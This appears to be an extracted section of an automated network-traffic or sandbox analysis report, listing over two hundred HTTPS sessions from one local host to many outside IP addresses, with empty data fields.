                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13257192.168.2.1356280132.236.68.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13258192.168.2.1360514162.164.248.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13259192.168.2.1341294204.134.253.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13260192.168.2.13382529.167.222.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13261192.168.2.1352354213.28.227.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13262192.168.2.1348092218.29.115.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13263192.168.2.1358488101.33.131.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13264192.168.2.1347580148.253.35.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13265192.168.2.133684820.34.29.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13266192.168.2.135818462.25.121.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13267192.168.2.134601697.106.73.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13268192.168.2.1353548209.20.251.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13269192.168.2.1344984113.34.127.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13270192.168.2.1339758167.190.184.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13271192.168.2.1340196163.114.168.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13272192.168.2.1335098194.133.64.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13273192.168.2.134861697.69.181.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13274192.168.2.133762257.145.50.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13275192.168.2.13580668.76.202.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13276192.168.2.133904070.231.219.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13277192.168.2.1353974152.38.49.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13278192.168.2.1337448165.27.37.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13279192.168.2.135988679.194.169.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13280192.168.2.1352834134.98.28.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13281192.168.2.1350000110.156.37.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13282192.168.2.133788219.49.56.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13283192.168.2.134150467.16.53.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13284192.168.2.134631873.197.245.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13285192.168.2.134703896.88.109.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13286192.168.2.1360792183.99.201.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13287192.168.2.1357174206.107.8.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13288192.168.2.1335204198.100.182.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13289192.168.2.1337152183.80.245.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13290192.168.2.134905476.131.228.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13291192.168.2.134855465.232.242.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13292192.168.2.1334844221.110.18.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13293192.168.2.1352030145.142.53.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13294192.168.2.1350084161.170.52.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13295192.168.2.1349898203.164.177.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13296192.168.2.133638476.24.129.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13297192.168.2.1357288108.20.160.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13298192.168.2.1336552108.182.109.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13299192.168.2.1347454141.231.199.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13300192.168.2.1348726184.2.21.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13301192.168.2.1356376134.152.106.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13302192.168.2.134368023.89.193.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13303192.168.2.1339912152.11.66.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13304192.168.2.1348578179.197.85.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13305192.168.2.1357328183.106.172.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13306192.168.2.1344094196.103.165.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13307192.168.2.135473464.0.153.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13308192.168.2.1341326123.212.40.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13309192.168.2.133565212.53.134.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13310192.168.2.1347214173.128.103.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13311192.168.2.1359708179.51.44.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13312192.168.2.1350136141.205.136.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13313192.168.2.1360022210.32.93.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13314192.168.2.133857662.0.184.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13315192.168.2.1335910131.76.227.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13316192.168.2.133350843.38.24.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13317192.168.2.134268092.62.151.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13318192.168.2.134778246.31.166.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13319192.168.2.1360302119.68.139.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13320192.168.2.133567063.60.95.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13321192.168.2.133510648.76.108.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13322192.168.2.134681471.196.81.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13323192.168.2.135094847.175.173.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13324192.168.2.1339674117.9.207.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13325192.168.2.135660460.181.99.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13326192.168.2.1345040189.247.113.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13327192.168.2.1335004102.221.242.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13328192.168.2.1333950112.195.67.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13329192.168.2.1342864175.160.10.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13330192.168.2.1332790172.155.38.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13331192.168.2.1357256155.208.117.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13332192.168.2.1359780178.59.5.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13333192.168.2.1355834124.218.167.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13334192.168.2.135009888.46.7.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13335192.168.2.134558424.102.204.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13336192.168.2.134008687.16.228.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13337192.168.2.1356946177.248.205.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13338192.168.2.134341024.87.186.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13339192.168.2.135650652.205.212.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13340192.168.2.1353732210.98.202.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13341192.168.2.1339382200.99.154.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13342192.168.2.13569025.22.178.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13343192.168.2.13351108.229.19.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13344192.168.2.135829434.31.128.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13345192.168.2.133743852.249.230.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13346192.168.2.1342010168.165.181.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13347192.168.2.136024070.224.71.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13348192.168.2.1340940176.66.119.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13349192.168.2.1336882137.218.70.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13350192.168.2.135229278.98.101.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13351192.168.2.1355384161.144.72.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13352192.168.2.135902297.132.98.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13353192.168.2.134441675.60.86.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13354192.168.2.1347950186.140.65.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13355192.168.2.1337472118.186.19.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13356192.168.2.135785813.154.233.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13357192.168.2.1334624168.234.114.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13358192.168.2.1339706204.248.242.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13359192.168.2.135372685.189.172.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13360192.168.2.135155674.229.196.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13361192.168.2.133347868.187.2.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13362192.168.2.133603832.242.37.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13363192.168.2.134559420.110.162.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13364192.168.2.134381683.235.3.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13365192.168.2.1334710117.223.49.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13366192.168.2.1346274168.17.235.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13367192.168.2.134986891.249.89.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13368192.168.2.134523096.21.49.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13369192.168.2.135139412.31.51.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13370192.168.2.135695644.223.160.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13371192.168.2.1359472199.205.188.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13372192.168.2.134281051.238.22.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13373192.168.2.1353896146.18.244.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13374192.168.2.135064468.28.244.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13375192.168.2.135687820.170.226.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13376192.168.2.135900613.43.149.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13377192.168.2.1346486211.250.83.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13378192.168.2.135561894.31.105.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13379192.168.2.1356040114.201.224.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13380192.168.2.1339766124.98.120.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13381192.168.2.1336322109.75.34.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13382192.168.2.1344808217.146.215.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13383192.168.2.133808488.19.252.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13384192.168.2.133574469.129.158.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13385192.168.2.1351398185.179.81.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13386192.168.2.133724088.47.234.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13387192.168.2.1351586190.115.114.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13388192.168.2.1345122177.217.128.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13389192.168.2.1337220112.211.172.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13390192.168.2.1339668145.157.151.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13391192.168.2.133476881.18.8.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13392192.168.2.1352502170.64.94.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13393192.168.2.1360778160.225.186.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13394192.168.2.1356248172.102.251.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13395192.168.2.1345462182.17.20.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13396192.168.2.134319691.180.234.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13397192.168.2.1351590115.53.113.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13398192.168.2.1348024161.168.143.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13399192.168.2.1348612167.153.194.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13400192.168.2.1340282113.194.15.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13401192.168.2.1359634115.36.243.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13402192.168.2.133730465.180.63.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13403192.168.2.1360348161.246.7.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13404192.168.2.1355494140.69.233.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13405192.168.2.13381584.115.63.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13406192.168.2.1341606137.11.90.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13407192.168.2.1347076183.30.181.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13408192.168.2.1336272209.145.81.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13409192.168.2.1360596191.228.156.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13410192.168.2.134604079.201.153.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13411192.168.2.1354158176.253.104.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13412192.168.2.1336868222.115.90.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13413192.168.2.1342084155.217.177.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13414192.168.2.1341092159.33.236.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13415192.168.2.1340784103.179.188.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13416192.168.2.1335498198.181.196.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13417192.168.2.135596432.88.150.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13418192.168.2.134073887.20.227.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13419192.168.2.134585624.208.198.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13420192.168.2.1333468133.158.41.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13421192.168.2.134916498.186.82.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13422192.168.2.134650466.63.249.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13423192.168.2.133672865.173.49.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13424192.168.2.1339124128.210.3.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13425192.168.2.1354436118.64.116.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13426192.168.2.135382465.124.156.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13427192.168.2.133687242.239.33.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13428192.168.2.135971676.44.114.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13429192.168.2.135557213.229.216.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13430192.168.2.13519989.211.85.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13431192.168.2.135422674.4.218.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13432192.168.2.133471688.119.214.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13433192.168.2.134322673.137.244.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13434192.168.2.1360616211.59.165.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13435192.168.2.1348306144.3.196.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13436192.168.2.1351174133.18.53.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13437192.168.2.134100862.53.239.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13438192.168.2.1335416124.185.85.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13439192.168.2.1337278173.153.254.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13440192.168.2.1350380143.212.148.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13441192.168.2.134203624.98.131.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13442192.168.2.1350698105.143.102.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13443192.168.2.134293254.104.107.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13444192.168.2.1360074213.68.208.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13445192.168.2.1337800211.152.149.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13446192.168.2.1354214186.83.148.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13447192.168.2.134546277.80.152.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13448192.168.2.135730451.45.85.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13449192.168.2.1357752124.229.198.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13450192.168.2.134167253.161.142.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13451192.168.2.134048038.75.105.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13452192.168.2.135971838.246.139.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13453192.168.2.1349368129.98.185.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13454192.168.2.1354592170.94.67.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13455192.168.2.133978649.47.184.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13456192.168.2.1340642135.193.48.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13457192.168.2.135242665.41.63.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13458192.168.2.1344646111.202.149.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13459192.168.2.13585482.90.12.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13460192.168.2.134702866.171.144.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13461192.168.2.134578440.131.216.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13462192.168.2.133737470.136.222.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13463192.168.2.13389742.110.91.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13464192.168.2.1357988206.159.1.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13465192.168.2.135290274.215.120.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13466192.168.2.135926261.184.253.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13467192.168.2.133612492.170.18.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13468192.168.2.1347828115.233.59.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
